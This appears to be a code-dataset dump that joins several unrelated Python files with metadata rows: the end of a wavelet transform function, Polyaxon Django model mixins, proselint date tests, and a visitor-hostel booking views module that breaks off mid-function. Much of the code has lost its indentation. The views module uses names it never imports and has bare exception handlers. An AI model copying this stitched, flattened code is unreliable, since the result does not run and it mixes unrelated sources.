oshape (tuple): Output shape.
wave_name (str): Wavelet name.
axes (None or tuple of int): Axes to perform wavelet transform.
level (None or int): Number of wavelet levels.
inplace (bool): Modify input array in place.
"""
device = backend.get_device(input)
xp = device.xp
if axes is None:
axes = tuple([k for k in range(len(input.shape))
if input.shape[k] > 1])
if (type(axes) == int):
axes = (axes,)
wavdct = pywt.Wavelet(wave_name)
rec_lo = xp.array(wavdct.rec_lo)
rec_hi = xp.array(wavdct.rec_hi)
if level is None:
level = pywt.dwt_max_level(
xp.min(xp.array([input.shape[ax] for ax in axes])),
rec_lo.size)
if level <= 0:
return input
assert level > 0
for ax in axes:
assert input.shape[ax] % 2 == 0
x = input if inplace else input.astype(xp.complex64).copy()
approx_idx = tuple([slice(0, input.shape[k]//2)
if k in axes else slice(0, None)
for k in range(len(input.shape))])
x[approx_idx] = iwt(x[approx_idx], input[approx_idx].shape,
wave_name=wave_name, axes=axes, level=level-1,
inplace=True)
y = apply_rec_along_axis(x, axes, rec_lo, rec_hi)
crop_idx = tuple([slice(0, oshape[k])
if k in axes else slice(0, None)
for k in range(len(input.shape))])
return y[crop_idx]
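# Round-trip sketch: iwt needs the original shape so it can crop away the
# padding added by fwt (same arbitrary example as above):
#
# y = fwt(x, wave_name='db4', axes=(0, 1), level=2)
# x_rec = iwt(y, x.shape, wave_name='db4', axes=(0, 1), level=2)
# # x_rec should match x up to floating-point error.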
| 33.4 | 79 | 0.582427 |
4a1f40c67476927f55498537edaeaf10fa08ffa6 | 7,344 | py | Python | polyaxon/db/models/utils.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | polyaxon/db/models/utils.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | polyaxon/db/models/utils.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | import uuid
from django.contrib.postgres.fields import ArrayField, JSONField
from django.core.cache import cache
from django.core.validators import validate_slug
from django.db import models
from django.utils.functional import cached_property
from libs.blacklist import validate_blacklist_name
from libs.spec_validation import validate_outputs_config, validate_persistence_config
from polyaxon_schemas.environments import OutputsConfig, PersistenceConfig
class DescribableModel(models.Model):
description = models.TextField(blank=True, null=True)
class Meta:
abstract = True
@property
def has_description(self):
return bool(self.description)
class NameableModel(models.Model):
name = models.CharField(
max_length=256,
blank=True,
null=True,
default=None,
validators=[validate_slug, validate_blacklist_name])
class Meta:
abstract = True
class SequenceManager(models.Manager):
def get_queryset(self):
return super().get_queryset().order_by('sequence')
class SequenceModel(models.Model):
sequence = models.PositiveSmallIntegerField(
editable=False,
null=False)
objects = models.Manager()
sequence_objects = SequenceManager()
class Meta:
abstract = True
def _set_sequence(self, filter_query):
if self.pk is None:
last = filter_query.last()
self.sequence = 1
if last:
self.sequence = last.sequence + 1
class DiffModel(models.Model):
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
class RunTimeModel(models.Model):
started_at = models.DateTimeField(blank=True, null=True)
finished_at = models.DateTimeField(blank=True, null=True)
class Meta:
abstract = True
class TypeModel(models.Model):
name = models.CharField(max_length=128, unique=True)
schema_definition = models.TextField()
class Meta:
abstract = True
def __str__(self):
return self.name
class TagModel(models.Model):
tags = ArrayField(
base_field=models.CharField(max_length=64),
blank=True,
null=True,
help_text='The parameters used for this experiment.')
class Meta:
abstract = True
class PersistenceModel(models.Model):
persistence = JSONField(
null=True,
blank=True,
help_text='The persistence definition.',
validators=[validate_persistence_config])
class Meta:
abstract = True
@cached_property
def persistence_config(self):
return PersistenceConfig.from_dict(self.persistence) if self.persistence else None
@cached_property
def persistence_data(self):
return self.persistence_config.data if self.persistence_config else None
@cached_property
def persistence_outputs(self):
return self.persistence_config.outputs if self.persistence_config else None
class OutputsModel(models.Model):
outputs = JSONField(
null=True,
blank=True,
help_text='The persistence definition.',
validators=[validate_outputs_config])
outputs_refs = models.OneToOneField(
'db.OutputsRefs',
related_name='+',
blank=True,
null=True,
editable=False,
on_delete=models.SET_NULL)
class Meta:
abstract = True
@cached_property
def outputs_config(self):
return OutputsConfig.from_dict(self.outputs) if self.outputs else None
@cached_property
def outputs_jobs(self):
return self.outputs_config.jobs if self.outputs_config else None
@cached_property
def outputs_experiments(self):
return self.outputs_config.experiments if self.outputs_config else None
@cached_property
def outputs_refs_jobs(self):
if not self.outputs_refs:
return None
specs = self.outputs_refs.get_jobs_outputs_spec()
if not specs:
return None
# Return an ordered list
refs = []
for job in self.outputs_jobs:
refs.append(specs[int(job)])
return refs
@cached_property
def outputs_refs_experiments(self):
if not self.outputs_refs:
return None
specs = self.outputs_refs.get_experiments_outputs_spec()
if not specs:
return None
# Return an ordered list
refs = []
for experiment in self.outputs_experiments:
refs.append(specs[int(experiment)])
return refs
class Singleton(DiffModel):
"""A base model to represents a singleton."""
class Meta:
abstract = True
def set_cache(self):
cache.set(self.__class__.__name__, self)
def save(self, *args, **kwargs): # pylint:disable=arguments-differ
self.pk = 1
super().save(*args, **kwargs)
self.set_cache()
def delete(self, *args, **kwargs): # pylint:disable=arguments-differ
pass
@classmethod
def may_be_update(cls, obj):
raise NotImplementedError # noqa
@classmethod
def load(cls):
raise NotImplementedError # noqa
class StatusModel(models.Model):
"""A model that represents a status at certain time.
This is an abstract class, every subclass must implement a status attribute,
it must implement also Foreignkey to the model that needs a status.
e.g.
# status = db.CharField(
max_length=64,
blank=True,
null=True,
default=STATUSES.CREATED,
choices=STATUSES.CHOICES)
# job = db.ForeignKey(Job, on_delete=db.CASCADE, related_name='statuses')
"""
STATUSES = None
uuid = models.UUIDField(
default=uuid.uuid4,
editable=False,
unique=True,
null=False)
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
message = models.CharField(max_length=256, null=True, blank=True)
def __str__(self):
        return '{} <{}>'.format(self.uuid, self.status)
class Meta:
verbose_name_plural = 'Statuses'
ordering = ['created_at']
abstract = True
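# A minimal concrete subclass, mirroring the docstring above. This is an
# illustrative sketch only: ``JobLifeCycle`` and ``Job`` are hypothetical
# names, not models defined in this module.
#
# class JobStatus(StatusModel):
#     STATUSES = JobLifeCycle
#     status = models.CharField(
#         max_length=64, blank=True, null=True,
#         default=JobLifeCycle.CREATED, choices=JobLifeCycle.CHOICES)
#     job = models.ForeignKey(Job, on_delete=models.CASCADE,
#                             related_name='statuses')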
class LastStatusMixin(object):
"""A mixin that extracts the logic of last_status.
This is an abstract class, every subclass must implement a status attribute,
as well as a last_status attribute:
e.g.
status = db.OneToOneField(
'ExperimentStatus',
related_name='+',
blank=True,
null=True,
editable=True,
on_delete=db.SET_NULL)
"""
STATUSES = None
@property
def last_status(self):
return self.status.status if self.status else None
@property
def is_running(self):
return self.STATUSES.is_running(self.last_status)
@property
def is_done(self):
return self.STATUSES.is_done(self.last_status)
@property
def failed(self):
return self.STATUSES.failed(self.last_status)
@property
def succeeded(self):
return self.STATUSES.succeeded(self.last_status)
@property
def stopped(self):
return self.STATUSES.stopped(self.last_status)
def set_status(self, status, message=None, **kwargs):
        raise NotImplementedError  # noqa
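# Sketch of how LastStatusMixin is meant to pair with a StatusModel subclass
# (hypothetical models; the concrete class must supply set_status itself):
#
# class Job(models.Model, LastStatusMixin):
#     STATUSES = JobLifeCycle
#     status = models.OneToOneField(
#         'db.JobStatus', related_name='+', blank=True, null=True,
#         editable=True, on_delete=models.SET_NULL)
#
#     def set_status(self, status, message=None, **kwargs):
#         # create a new JobStatus row and point ``status`` at it
#         self.status = JobStatus.objects.create(
#             job=self, status=status, message=message)
#         self.save(update_fields=['status'])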
| 25.411765 | 90 | 0.663263 |
4a1f42bfb6af3b37472ac44074549577cd4e3690 | 1,012 | py | Python | tests/test_garner_dates.py | ankita240796/proselint | 50d2a482df8f467737f9c958ace98ba152bec832 | [
"BSD-3-Clause"
] | 4,163 | 2015-10-03T07:37:21.000Z | 2022-03-31T03:52:32.000Z | tests/test_garner_dates.py | ankita240796/proselint | 50d2a482df8f467737f9c958ace98ba152bec832 | [
"BSD-3-Clause"
] | 878 | 2015-09-30T20:03:33.000Z | 2022-03-28T11:06:15.000Z | tests/test_garner_dates.py | ankita240796/proselint | 50d2a482df8f467737f9c958ace98ba152bec832 | [
"BSD-3-Clause"
] | 249 | 2015-10-04T12:21:27.000Z | 2022-02-28T22:13:11.000Z | """Test garner.dates."""
from proselint.checks.dates_times import dates
from .check import Check
class TestCheck(Check):
"""Test class for garner.dates."""
__test__ = True
def test_50s_hyphenation(self):
"""Find unneeded hyphen in 50's."""
text = """The 50's were swell."""
errors = dates.check_decade_apostrophes_short(text)
assert len(errors) == 1
def test_50_Cent_hyphenation(self):
"""Don't flag 50's when it refers to 50 Cent's manager."""
text = """
Dr. Dre suggested to 50's manager that he look into signing
Eminem to the G-Unit record label.
"""
errors = dates.check_decade_apostrophes_short(text)
assert len(errors) == 0
def test_dash_and_from(self):
"""Test garner.check_dash_and_from."""
text = """From 1999-2002, Sally served as chair of the committee."""
errors = dates.check_dash_and_from(text)
print(errors)
assert len(errors) == 1
| 29.764706 | 76 | 0.624506 |
4a1f42efdbf20f87fdb3bf6da8d13dfb1bdb1fcc | 41,264 | py | Python | FusionIIIT/applications/visitor_hostel/views.py | ssaksham9/Fusion | f1e405b457dba399411a2ddb79a9068746c05057 | [
"bzip2-1.0.6"
] | 2 | 2020-01-24T16:34:54.000Z | 2020-08-01T05:09:24.000Z | FusionIIIT/applications/visitor_hostel/views.py | ssaksham9/Fusion | f1e405b457dba399411a2ddb79a9068746c05057 | [
"bzip2-1.0.6"
] | null | null | null | FusionIIIT/applications/visitor_hostel/views.py | ssaksham9/Fusion | f1e405b457dba399411a2ddb79a9068746c05057 | [
"bzip2-1.0.6"
] | 5 | 2020-01-21T11:27:06.000Z | 2020-02-07T13:53:49.000Z | import datetime
from datetime import date
import xlrd
import os
from applications.visitor_hostel.models import RoomDetail
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from django.http import HttpResponseRedirect
from django.shortcuts import HttpResponse, get_object_or_404, redirect, render
from applications.globals.models import *
from applications.visitor_hostel.forms import *
from applications.visitor_hostel.models import *
import numpy as np
from .forms import InventoryForm
# for notifications
from notification.views import visitors_hostel_notif
# main page showing dashboard of user
@login_required(login_url='/accounts/login/')
def visitorhostel(request):
# intenders
intenders = User.objects.all()
user = request.user
# intender = request.user.holds_designations.filter(designation__name = 'Intender').exists()
vhcaretaker = request.user.holds_designations.filter(
designation__name='VhCaretaker').exists()
vhincharge = request.user.holds_designations.filter(
designation__name='VhIncharge').exists()
# finding designation of user
user_designation = "student"
if vhincharge:
user_designation = "VhIncharge"
elif vhcaretaker:
user_designation = "VhCaretaker"
else:
user_designation = "Intender"
available_rooms = {}
forwarded_rooms = {}
cancel_booking_request = []
# bookings for intender view
if (user_designation == "Intender"):
all_bookings = BookingDetail.objects.all().order_by('booking_from')
pending_bookings = BookingDetail.objects.filter(Q(status="Pending") | Q(status="Forward"), booking_to__gte=datetime.datetime.today(), intender=user).order_by('booking_from')
active_bookings = BookingDetail.objects.filter(status="CheckedIn", booking_to__gte=datetime.datetime.today(), intender=user).select_related().order_by('booking_from')
dashboard_bookings = BookingDetail.objects.filter(Q(status = "Pending") | Q(status="Forward") | Q(status = "Confirmed") | Q(status = 'Rejected'), booking_to__gte=datetime.datetime.today(), intender=user).order_by('booking_from')
# print(dashboard_bookings.booking_from)
visitors = {}
rooms = {}
for booking in active_bookings:
temp = range(2, booking.person_count + 1)
visitors[booking.id] = temp
for booking in active_bookings:
for room_no in booking.rooms.all():
temp2 = range(1, booking.number_of_rooms_alloted)
rooms[booking.id] = temp2
complete_bookings = BookingDetail.objects.filter(booking_to__lt=datetime.datetime.today(), intender=user).select_related().order_by('booking_from')
canceled_bookings = BookingDetail.objects.filter(status="Canceled", intender=user).select_related().order_by('booking_from')
rejected_bookings = BookingDetail.objects.filter(status='Rejected', intender=user).order_by('booking_from')
cancel_booking_requested = BookingDetail.objects.filter(status='CancelRequested', intender=user).order_by('booking_from')
else: # booking for caretaker and incharge view
all_bookings = BookingDetail.objects.all().order_by('booking_from')
pending_bookings = BookingDetail.objects.filter(Q(status="Pending") | Q(status="Forward"), booking_to__gte=datetime.datetime.today()).order_by('booking_from')
active_bookings = BookingDetail.objects.filter(Q(status="Confirmed") | Q(status="CheckedIn"), booking_to__gte=datetime.datetime.today()).select_related().order_by('booking_from')
cancel_booking_request = BookingDetail.objects.filter(status="CancelRequested", booking_to__gte=datetime.datetime.today()).order_by('booking_from')
dashboard_bookings = BookingDetail.objects.filter(Q(status = "Pending") | Q(status="Forward") | Q(status = "Confirmed"), booking_to__gte=datetime.datetime.today()).order_by('booking_from')
visitors = {}
rooms = {}
# x = BookingDetail.objects.all().annotate(rooms_count=Count('rooms'))
c_bookings = BookingDetail.objects.filter(Q(status="Forward"), booking_to__gte=datetime.datetime.today()).order_by('booking_from')
# number of visitors
for booking in active_bookings:
temp = range(2, booking.person_count + 1)
visitors[booking.id] = temp
# rooms alloted to booking
for booking in active_bookings:
for room_no in booking.rooms.all():
temp2 = range(2, booking.number_of_rooms_alloted + 1)
rooms[booking.id] = temp2
print(booking.rooms.all())
complete_bookings = BookingDetail.objects.filter(Q(status="Canceled") | Q(status="Complete"), booking_to__lt=datetime.datetime.today()).select_related().order_by('booking_from')
canceled_bookings = BookingDetail.objects.filter(status="Canceled").select_related().order_by('booking_from')
cancel_booking_requested = BookingDetail.objects.filter(status='CancelRequested', booking_to__gte=datetime.datetime.today(), intender=user).order_by('booking_from')
rejected_bookings = BookingDetail.objects.filter(status='Rejected').order_by('booking_from')
# finding available room list for alloting rooms
for booking in pending_bookings:
booking_from = booking.booking_from
booking_to = booking.booking_to
temp1 = booking_details(booking_from, booking_to)
available_rooms[booking.id] = temp1
# forwarded rooms details
for booking in c_bookings:
booking_from = booking.booking_from
booking_to = booking.booking_to
temp2 = forwarded_booking_details(booking_from, booking_to)
forwarded_rooms[booking.id] = temp2
# inventory data
inventory = Inventory.objects.all()
inventory_bill = InventoryBill.objects.all()
# completed booking bills
completed_booking_bills = {}
all_bills = Bill.objects.select_related()
current_balance = 0
for bill in all_bills:
completed_booking_bills[bill.id] = {'intender': str(bill.booking.intender), 'booking_from': str(bill.booking.booking_from), 'booking_to': str(bill.booking.booking_to), 'total_bill': str(bill.meal_bill + bill.room_bill)}
current_balance = current_balance+bill.meal_bill + bill.room_bill
for inv_bill in inventory_bill:
current_balance = current_balance - inv_bill.cost
active_visitors = {}
for booking in active_bookings:
if booking.status == 'CheckedIn':
for visitor in booking.visitor.all():
active_visitors[booking.id] = visitor
# edit_room_statusForm=RoomStatus.objects.filter(Q(status="UnderMaintenance") | Q(status="Available"))
previous_visitors = VisitorDetail.objects.all()
# ------------------------------------------------------------------------------------------------------------------------------
bills = {}
for booking in active_bookings:
if booking.status == 'CheckedIn':
rooms = booking.rooms.all()
days = (datetime.date.today() - booking.check_in).days
category = booking.visitor_category
person = booking.person_count
room_bill = 0
if days == 0:
days = 1
if category == 'A':
room_bill = 0
elif category == 'B':
for i in rooms:
if i.room_type == 'SingleBed':
room_bill = room_bill+days*400
else:
room_bill = room_bill+days*500
elif category == 'C':
for i in rooms:
if i.room_type == 'SingleBed':
room_bill = room_bill+days*800
else:
room_bill = room_bill+days*1000
else:
for i in rooms:
if i.room_type == 'SingleBed':
room_bill = room_bill+days*1400
else:
room_bill = room_bill+days*1600
mess_bill = 0
for visitor in booking.visitor.all():
meal = MealRecord.objects.filter(visitor=visitor)
mess_bill1 = 0
for m in meal:
if m.morning_tea == True:
mess_bill1 = mess_bill1+10
if m.eve_tea == True:
mess_bill1 = mess_bill1+10
if m.breakfast == True:
mess_bill1 = mess_bill1+50
if m.lunch == True:
mess_bill1 = mess_bill1+100
if m.dinner == True:
mess_bill1 = mess_bill1+100
if mess_bill1 == 270:
mess_bill = mess_bill+225
else:
mess_bill = mess_bill + mess_bill1
total_bill = mess_bill + room_bill
bills[booking.id] = {'mess_bill': mess_bill,
'room_bill': room_bill, 'total_bill': total_bill}
# print(available_rooms)
# -------------------------------------------------------------------------------------------------------------------------------
visitor_list = []
for b in dashboard_bookings:
count=1
b_visitor_list = b.visitor.all()
for v in b_visitor_list:
if count == 1:
visitor_list.append(v)
count = count+1
return render(request, "vhModule/visitorhostel.html",
{'all_bookings': all_bookings,
'complete_bookings': complete_bookings,
'pending_bookings': pending_bookings,
'active_bookings': active_bookings,
'canceled_bookings': canceled_bookings,
'dashboard_bookings' : dashboard_bookings,
'bills': bills,
# 'all_rooms_status' : all_rooms_status,
'available_rooms': available_rooms,
'forwarded_rooms': forwarded_rooms,
# 'booked_rooms' : booked_rooms,
# 'under_maintainence_rooms' : under_maintainence_rooms,
# 'occupied_rooms' : occupied_rooms,
'inventory': inventory,
'inventory_bill': inventory_bill,
'active_visitors': active_visitors,
'intenders': intenders,
'user': user,
'visitors': visitors,
'rooms' : rooms,
# 'num_rooms' : list(range(1, booking.number_of_rooms_alloted+1)),
# 'num_rooms' :list(range(1, booking.number_of_rooms_alloted+1)),
'previous_visitors': previous_visitors,
'completed_booking_bills': completed_booking_bills,
'current_balance': current_balance,
'rejected_bookings': rejected_bookings,
'cancel_booking_request': cancel_booking_request,
'cancel_booking_requested' : cancel_booking_requested,
'user_designation': user_designation})
# Get methods for bookings
@login_required(login_url='/accounts/login/')
def get_booking_requests(request):
if request.method == 'POST':
pending_bookings = BookingDetail.objects.filter(status="Pending")
return render(request, "vhModule/visitorhostel.html", {'pending_bookings': pending_bookings})
else:
return HttpResponseRedirect('/visitorhostel/')
# getting active bookings
@login_required(login_url='/accounts/login/')
def get_active_bookings(request):
if request.method == 'POST':
active_bookings = BookingDetail.objects.filter(status="Confirmed")
        return render(request, "vhModule/visitorhostel.html", {'active_bookings': active_bookings})
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def get_inactive_bookings(request):
if request.method == 'POST':
inactive_bookings = BookingDetail.objects.filter(
Q(status="Cancelled") | Q(status="Rejected") | Q(status="Complete"))
return render(request, "vhModule/visitorhostel.html", {'inactive_bookings': inactive_bookings})
else:
return HttpResponseRedirect('/visitorhostel/')
# Method for making booking request
@login_required(login_url='/accounts/login/')
def get_booking_form(request):
if request.method == 'POST':
intenders = User.objects.all()
return render(request, "vhModule/visitorhostel.html", {'intenders': intenders})
else:
return HttpResponseRedirect('/visitorhostel/')
# request booking form action view starts here
@login_required(login_url='/accounts/login/')
def request_booking(request):
if request.method == 'POST':
flag=0
# getting details from request form
intender = request.POST.get('intender')
user = User.objects.get(id=intender)
booking_id = "VH"+str(datetime.datetime.now())
category = request.POST.get('category')
person_count = request.POST.get('number-of-people')
bookingObject = []
if person_count and (int(person_count)<20):
person_count = person_count
else:
flag = 1 # for error
# person_count = 1
purpose_of_visit = request.POST.get('purpose-of-visit')
booking_from = request.POST.get('booking_from')
booking_to = request.POST.get('booking_to')
booking_from_time = request.POST.get('booking_from_time')
booking_to_time = request.POST.get('booking_to_time')
remarks_during_booking_request = request.POST.get('remarks_during_booking_request')
bill_to_be_settled_by = request.POST.get('bill_settlement')
number_of_rooms = request.POST.get('number-of-rooms')
        # cannot allot more rooms than guests
        if flag == 0 and int(person_count) < int(number_of_rooms):
            flag = 1
        if flag == 0:
bookingObject = BookingDetail.objects.create(purpose=purpose_of_visit,
intender=user,
booking_from=booking_from,
booking_to=booking_to,
visitor_category=category,
person_count=person_count,
arrival_time=booking_from_time,
departure_time=booking_to_time,
remark=remarks_during_booking_request,
number_of_rooms=number_of_rooms,
bill_to_be_settled_by=bill_to_be_settled_by)
            # in case of any attachment
            doc = request.FILES.get('files-during-booking-request')
            if doc:
                # store the attachment under MEDIA_ROOT/VhImage/ using the booking id as the file name
                file_extension = os.path.splitext(doc.name)[1]
                filename = booking_id
                full_path = settings.MEDIA_ROOT + "/VhImage/"
                url = settings.MEDIA_URL + filename + file_extension
                if not os.path.isdir(full_path):
                    os.makedirs(full_path)
                fs = FileSystemStorage(full_path, url)
                fs.save(filename + file_extension, doc)
                uploaded_file_url = "/media/online_cms/" + filename + file_extension
bookingObject.image = uploaded_file_url
bookingObject.save()
            # visitor details from the place request form
visitor_name = request.POST.get('name')
visitor_phone = request.POST.get('phone')
visitor_email = request.POST.get('email')
visitor_address = request.POST.get('address')
visitor_organization = request.POST.get('organization')
visitor_nationality = request.POST.get('nationality')
# visitor_nationality="jk"
if visitor_organization == '':
visitor_organization = ' '
visitor = VisitorDetail.objects.create(
visitor_phone=visitor_phone, visitor_name=visitor_name, visitor_email=visitor_email, visitor_address=visitor_address, visitor_organization=visitor_organization
, nationality=visitor_nationality
)
            bookingObject.visitor.add(visitor)
            bookingObject.save()
# for sending notification of booking request to caretaker
caretaker_name = HoldsDesignation.objects.get(designation__name = "VhCaretaker")
visitors_hostel_notif(request.user, caretaker_name.user, 'booking_request')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# updating a booking request
@login_required(login_url='/accounts/login/')
def update_booking(request):
if request.method == 'POST':
user = request.user
print(request.POST)
booking_id = request.POST.get('booking-id')
category = request.POST.get('category')
person_count = request.POST.get('number-of-people')
bookingObject = []
if person_count:
person_count = person_count
else:
person_count = 1
purpose_of_visit = request.POST.get('purpose-of-visit')
booking_from = request.POST.get('booking_from')
booking_to = request.POST.get('booking_to')
number_of_rooms = request.POST.get('number-of-rooms')
# remark = request.POST.get('remark')
booking = BookingDetail.objects.get(id=booking_id)
booking.person_count = person_count
booking.number_of_rooms = number_of_rooms
booking.booking_from = booking_from
booking.booking_to = booking_to
booking.purpose = purpose_of_visit
booking.save()
# BookingDetail.objects.filter(id=booking_id).update(person_count=person_count,
# purpose=purpose_of_visit,
# booking_from=booking_from,
# booking_to=booking_to,
# number_of_rooms=number_of_rooms)
        # rebuild the forwarded-rooms map for forwarded bookings that are still current
        forwarded_rooms = {}
        c_bookings = BookingDetail.objects.filter(Q(status="Forward"), booking_to__gte=datetime.datetime.today()).order_by('booking_from')
        for booking in c_bookings:
            forwarded_rooms[booking.id] = forwarded_booking_details(booking.booking_from, booking.booking_to)
        return render(request, "vhModule/visitorhostel.html",
                      {'forwarded_rooms': forwarded_rooms})
else:
return HttpResponseRedirect('/visitorhostel/')
# confirm booking by VhIncharge
@login_required(login_url='/accounts/login/')
def confirm_booking(request):
if request.method == 'POST':
booking_id = request.POST.get('booking-id')
        intender = request.POST.get('intender')
category = request.POST.get('category')
purpose = request.POST.get('purpose')
booking_from = request.POST.get('booking_from')
booking_to = request.POST.get('booking_to')
person_count = request.POST.get('numberofpeople')
# rooms list
rooms = request.POST.getlist('rooms[]')
print(rooms)
        bd = BookingDetail.objects.get(id=booking_id)
bd.status = 'Confirmed'
bd.category = category
for room in rooms:
room_object = RoomDetail.objects.get(room_number=room)
bd.rooms.add(room_object)
bd.save()
# notification of booking confirmation
visitors_hostel_notif(request.user, bd.intender, 'booking_confirmation')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def cancel_booking(request):
if request.method == 'POST':
user = request.user
print(request.POST)
booking_id = request.POST.get('booking-id')
remark = request.POST.get('remark')
charges = request.POST.get('charges')
BookingDetail.objects.filter(id=booking_id).update(
status='Canceled', remark=remark)
booking = BookingDetail.objects.get(id=booking_id)
# if no applicable charges then set charges to zero
x = 0
if charges:
Bill.objects.create(booking=booking, meal_bill=x, room_bill=int(charges), caretaker=user, payment_status=True)
else:
Bill.objects.create(booking=booking, meal_bill=x, room_bill=x, caretaker=user, payment_status=True)
complete_bookings = BookingDetail.objects.filter(Q(status="Canceled") | Q(status="Complete"), booking_to__lt=datetime.datetime.today()).select_related().order_by('booking_from')
# to notify the intender that his cancellation request has been confirmed
visitors_hostel_notif(request.user, booking.intender, 'booking_cancellation_request_accepted')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# cancel a confirmed booking by the intender
@login_required(login_url='/accounts/login/')
def cancel_booking_request(request):
if request.method == 'POST':
intender = request.user.holds_designations.filter(designation__name = 'VhIncharge')
booking_id = request.POST.get('booking-id')
remark = request.POST.get('remark')
BookingDetail.objects.filter(id=booking_id).update(status='CancelRequested', remark=remark)
incharge_name = HoldsDesignation.objects.get(designation__name = "VhIncharge")
        # to notify the VhIncharge about a new cancellation request
visitors_hostel_notif(request.user, incharge_name.user, 'cancellation_request_placed')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# reject a booking request
@login_required(login_url='/accounts/login/')
def reject_booking(request):
if request.method == 'POST':
booking_id = request.POST.get('booking-id')
remark = request.POST.get('remark')
        BookingDetail.objects.filter(id=booking_id).update(
            status="Rejected", remark=remark)
        booking = BookingDetail.objects.get(id=booking_id)
        # to notify the intender that their request has been rejected
        visitors_hostel_notif(request.user, booking.intender, 'booking_rejected')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# Guest check in view
@login_required(login_url='/accounts/login/')
def check_in(request):
if request.method == 'POST':
booking_id = request.POST.get('booking-id')
visitor_name = request.POST.get('name')
visitor_phone = request.POST.get('phone')
visitor_email = request.POST.get('email')
visitor_address = request.POST.get('address')
check_in_date = datetime.date.today()
# save visitors details
visitor = VisitorDetail.objects.create(
visitor_phone=visitor_phone, visitor_name=visitor_name, visitor_email=visitor_email, visitor_address=visitor_address)
try:
bd = BookingDetail.objects.get(id=booking_id)
bd.status = "CheckedIn"
bd.check_in = check_in_date
bd.visitor.add(visitor)
bd.save()
        except:
            return HttpResponseRedirect('/visitorhostel/')
        return HttpResponseRedirect('/visitorhostel/')
    else:
        return HttpResponseRedirect('/visitorhostel/')
# guest check out view
@login_required(login_url='/accounts/login/')
def check_out(request):
user = get_object_or_404(User, username=request.user.username)
c = ExtraInfo.objects.all().filter(user=user)
if user:
if request.method == 'POST':
id = request.POST.get('id')
meal_bill = request.POST.get('mess_bill')
room_bill = request.POST.get('room_bill')
BookingDetail.objects.filter(id=id).update(
check_out=datetime.datetime.today(), status="Complete")
booking = BookingDetail.objects.get(id=id)
Bill.objects.create(booking=booking, meal_bill=int(meal_bill), room_bill=int(
room_bill), caretaker=user, payment_status=True)
# for visitors in visitor_info:
# meal=Meal.objects.all().filter(visitor=v_id).distinct()
# print(meal)
# for m in meal:
# mess_bill1=0
# if m.morning_tea==True:
# mess_bill1=mess_bill1+ m.persons*10
# print(mess_bill1)
# if m.eve_tea==True:
# mess_bill1=mess_bill1+m.persons*10
# if m.breakfast==True:
# mess_bill1=mess_bill1+m.persons*50
# if m.lunch==True:
# mess_bill1=mess_bill1+m.persons*100
# if m.dinner==True:
# mess_bill1=mess_bill1+m.persons*100
#
# if mess_bill1==m.persons*270:
# mess_bill=mess_bill+225*m.persons
# else:
# mess_bill=mess_bill + mess_bill1
# RoomStatus.objects.filter(book_room=book_room[0]).update(status="Available",book_room='')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def record_meal(request):
user = get_object_or_404(User, username=request.user.username)
c = ExtraInfo.objects.all().filter(user=user)
if user:
if request.method == "POST":
id = request.POST.get('pk')
booking_id = request.POST.get('booking')
booking = BookingDetail.objects.get(id=booking_id)
visitor = VisitorDetail.objects.get(id=id)
date_1 = datetime.datetime.today()
food = request.POST.getlist('food[]')
if '1' in food:
m_tea = True
else:
m_tea = False
if '4' in food:
e_tea = True
else:
e_tea = False
if '2' in food:
breakfast = True
else:
breakfast = False
if '3' in food:
lunch = True
else:
lunch = False
if '5' in food:
dinner = True
else:
dinner = False
if request.POST.get('numberofpeople'):
person = request.POST.get('numberofpeople')
else:
person = 1
try:
meal = MealRecord.objects.get(
visitor=visitor, booking=booking, meal_date=date_1)
except:
meal = False
if meal:
meal.morning_tea = m_tea
meal.eve_tea = e_tea
meal.breakfast = breakfast
meal.lunch = lunch
meal.dinner = dinner
meal.save()
else:
MealRecord.objects.create(visitor=visitor,
booking=booking,
morning_tea=m_tea,
eve_tea=e_tea,
meal_date=date_1,
breakfast=breakfast,
lunch=lunch,
dinner=dinner,
persons=person)
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# generate bill records between date range
@login_required(login_url='/accounts/login/')
def bill_generation(request):
user = get_object_or_404(User, username=request.user.username)
c = ExtraInfo.objects.all().filter(user=user)
if user:
if request.method == 'POST':
v_id = request.POST.getlist('visitor')[0]
meal_bill = request.POST.getlist('mess_bill')[0]
room_bill = request.POST.getlist('room_bill')[0]
status = request.POST.getlist('status')[0]
if status == "True":
st = True
else:
st = False
user = get_object_or_404(User, username=request.user.username)
c = ExtraInfo.objects.filter(user=user)
visitor = Visitor.objects.filter(visitor_phone=v_id)
visitor = visitor[0]
visitor_bill = Visitor_bill.objects.create(
visitor=visitor, caretaker=user, meal_bill=meal_bill, room_bill=room_bill, payment_status=st)
            messages.success(request, 'guest checked out successfully')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# get available rooms list between date range
@login_required(login_url='/accounts/login/')
def room_availabity(request):
if request.method == 'POST':
date_1 = request.POST.get('start_date')
date_2 = request.POST.get('end_date')
available_rooms_list = []
available_rooms_bw_dates = booking_details(date_1, date_2)
print("Available rooms are ")
for room in available_rooms_bw_dates:
available_rooms_list.append(room.room_number)
available_rooms_array = np.asarray(available_rooms_list)
print(available_rooms_array)
return render(request, "vhModule/room-availability.html", {'available_rooms': available_rooms_array})
else:
